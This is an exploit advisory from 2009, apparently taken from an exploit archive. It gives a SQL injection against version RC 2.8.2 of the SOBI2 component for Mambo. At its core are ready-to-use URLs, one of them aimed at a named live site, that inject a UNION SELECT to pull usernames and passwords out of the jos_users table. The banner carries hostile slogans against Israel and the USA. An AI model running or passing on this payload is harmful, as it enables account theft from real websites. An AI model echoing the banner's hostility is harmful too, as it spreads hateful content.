Mambo Component SOBI2 RC 2.8.2 (bid) SQL Injection Vulnerability

2009-01-21 17:02:29


|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .

+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
| |
| GaZa WiLL NeVeR DiE |
| |
| GoTo H3LL { Israel & Usa } |
| |
| Proud To Be A MusLiM , Proud To Be A EgYpTiaN |
| |
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+


<<!>> Found by : Br1ght D@rk

<<!>> C0ntact : MiDo2005_2010 [at] hotmail.com

<<!>> Groups : EgY C0D3RS TeaM , SeCuRiTy G33KS

=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================


<<->> D0rk : find it

<<->> Exploit :>>>

:>>> http://www.site.co.il/index.php?option=com_sobi2&task=showbiz&bid=-78+union+select+0,concat(username,0x3a3a,password),0+from+jos_users--

<<->> DeM00 :>>> http://www.karmel.co.il/index.php?option=com_sobi2&task=showbiz&bid=-78+union+select+1,concat(username,0x3a3a,password),3+from+jos_users--

=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================

<<->> All freinds , all muslims , Egy C0ders , AsbMay Group,sec-geeks.com

<--[ sec-geeks.com ]-->

#

Fixes

No fixes

In order to submit a new fix you need to be registered.